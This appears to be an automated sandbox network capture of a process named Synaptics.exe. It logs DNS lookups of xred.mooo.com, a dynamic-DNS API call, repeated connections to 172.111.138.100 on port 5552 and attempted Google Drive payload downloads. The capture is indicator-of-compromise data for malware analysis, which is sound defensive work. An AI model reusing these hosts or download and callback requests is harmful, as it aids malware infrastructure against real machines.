Dec 30, 2024 11:41:49.433882952 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:49.433940887 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.434259892 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.434268951 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:49.447254896 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.447300911 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:49.447382927 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.447577000 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.447591066 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:50.030739069 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:50.030818939 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:50.041802883 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:50.041862011 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:50.047346115 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:50.047414064 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:50.065421104 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:50.065552950 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:53.730185986 CET	50009	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:53.735538006 CET	5552	50009	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:53.735690117 CET	50009	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:53.742168903 CET	50009	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:53.746926069 CET	5552	50009	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:54.113169909 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.113197088 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.113862991 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.113869905 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.114212990 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.114263058 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.114701986 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.114732027 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.115570068 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.115592003 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.115767956 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.115772963 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.124052048 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.124067068 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.124934912 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.124964952 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.404823065 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.404912949 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.407665968 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.407865047 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.408705950 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.408763885 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.408767939 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.408771038 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.408832073 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:54.408845901 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.408984900 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.409122944 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:54.452138901 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.452199936 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.452214003 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.452255964 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.452259064 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.452322006 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.452326059 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.452370882 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.452374935 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.452411890 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.452420950 CET	443	49982	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.452464104 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.603209972 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.603267908 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.603276968 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.603321075 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.603343010 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.603355885 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.603362083 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.603399992 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:54.603403091 CET	443	49984	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:54.603441954 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:55.098290920 CET	80	49714	69.42.215.252	192.168.2.7
Dec 30, 2024 11:41:55.098340034 CET	49714	80	192.168.2.7	69.42.215.252
Dec 30, 2024 11:41:55.884424925 CET	5552	50009	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:55.884493113 CET	50009	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:55.901096106 CET	50009	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:55.906240940 CET	5552	50009	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:58.796485901 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:58.797755003 CET	49714	80	192.168.2.7	69.42.215.252
Dec 30, 2024 11:41:58.800298929 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:58.800776005 CET	49982	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:58.800779104 CET	49984	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:42:02.832319021 CET	50069	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:02.837236881 CET	5552	50069	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:02.837331057 CET	50069	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:02.837779999 CET	50069	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:02.842601061 CET	5552	50069	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:04.989922047 CET	5552	50069	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:04.990237951 CET	50069	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:05.026817083 CET	50069	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:05.031621933 CET	5552	50069	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:11.880542040 CET	50096	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:11.885860920 CET	5552	50096	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:11.886004925 CET	50096	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:11.886295080 CET	50096	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:42:11.891052008 CET	5552	50096	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:45.670947075 CET	5552	50096	172.111.138.100	192.168.2.7
Dec 30, 2024 11:42:45.722357988 CET	50096	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:43:18.226252079 CET	5552	50096	172.111.138.100	192.168.2.7
Dec 30, 2024 11:43:18.269365072 CET	50096	5552	192.168.2.7	172.111.138.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:41:23.405854940 CET	60278	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:23.413964033 CET	53	60278	1.1.1.1	192.168.2.7
Dec 30, 2024 11:41:24.458645105 CET	58531	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:24.465737104 CET	53	58531	1.1.1.1	192.168.2.7
Dec 30, 2024 11:41:24.495754957 CET	53557	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:24.502746105 CET	53	53557	1.1.1.1	192.168.2.7
Dec 30, 2024 11:41:24.815861940 CET	65274	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:24.822396040 CET	53	65274	1.1.1.1	192.168.2.7
Dec 30, 2024 11:41:31.116616964 CET	63689	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:31.123765945 CET	53	63689	1.1.1.1	192.168.2.7
Dec 30, 2024 11:41:36.071849108 CET	62656	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:36.079782963 CET	53	62656	1.1.1.1	192.168.2.7
Dec 30, 2024 11:41:41.750637054 CET	50612	53	192.168.2.7	1.1.1.1
Dec 30, 2024 11:41:41.757802963 CET	53	50612	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 11:41:23.405854940 CET	192.168.2.7	1.1.1.1	0xd6c	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:24.458645105 CET	192.168.2.7	1.1.1.1	0xc170	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:24.495754957 CET	192.168.2.7	1.1.1.1	0xefc0	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:24.815861940 CET	192.168.2.7	1.1.1.1	0x5b5	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:31.116616964 CET	192.168.2.7	1.1.1.1	0x48f7	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:36.071849108 CET	192.168.2.7	1.1.1.1	0xc2a6	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:41.750637054 CET	192.168.2.7	1.1.1.1	0x951d	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 11:41:23.413964033 CET	1.1.1.1	192.168.2.7	0xd6c	No error (0)	docs.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:24.465737104 CET	1.1.1.1	192.168.2.7	0xc170	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:24.502746105 CET	1.1.1.1	192.168.2.7	0xefc0	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:24.822396040 CET	1.1.1.1	192.168.2.7	0x5b5	No error (0)	drive.usercontent.google.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:31.123765945 CET	1.1.1.1	192.168.2.7	0x48f7	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:36.079782963 CET	1.1.1.1	192.168.2.7	0xc2a6	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:41:41.757802963 CET	1.1.1.1	192.168.2.7	0x951d	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docs.google.com

drive.usercontent.google.com

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49714	69.42.215.252	80	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 11:41:24.519059896 CET	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Dec 30, 2024 11:41:25.097453117 CET	243	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 30 Dec 2024 10:41:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49707	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:24 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:24 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:24 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-auuYKKGNQ9WzoFCFr3vGUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49706	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:24 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:24 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:24 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-jMKJ-8wPpYDCpIL9BbkMtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49717	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:25 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-sW89yjG_UWtqI6aGihzVFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49716	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:25 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-El_2wbESaj8Ui_X4XdxR7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49718	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:25 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:41:25 UTC	1602	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5fKeLq9tTz_VBV69ykp_jYlg6_xgkEnw8DFu_9Yw7-aQHEViecQ9ryrHUq1L-uzSXMQDC2fbI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:25 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-If7EhUa8VTraOH3ed7pO8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=IZV7_MT29K_cxs0Nlxc8NrQsu7GIabYRwvAYyyBEG0ekIEnUSL5dRTn9BoOc-2RMuqJinZhHwWGgvZReah0g78tv1ceI0jq0HZXyS5oixjt6ZrbYAYJwUDrxT-ajTd35EtLwyGXMjw0vaJ5SzWgtRWzcs5Kh7ukp3PtC3WuA9LpqEwgbrEBxGgmG; expires=Tue, 01-Jul-2025 10:41:25 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:25 UTC	1602	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 5f 46 67 46 55 44 6b 6c 73 6b 6b 39 5f 64 4c 35 66 69 4d 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7_FgFUDklskk9_dL5fiMbw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:41:25 UTC	50	IN	Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: is server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49719	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:25 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:41:25 UTC	1595	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7iMyOfv-K1V_0Cm8o0F1Vkhmx78RyT2yrxBWqydySKXHchDXMwFDAJ6PmPJrT9162T Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:25 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-RWkKHWRb0sL6qy8gXpX19Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD; expires=Tue, 01-Jul-2025 10:41:25 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:25 UTC	1595	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 7a 37 77 72 39 63 6d 72 33 30 78 62 6e 46 31 6f 37 46 4b 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Fz7wr9cmr30xbnF1o7FKlA">*{margin:0;padding:0}html,code{font:15px/22px arial
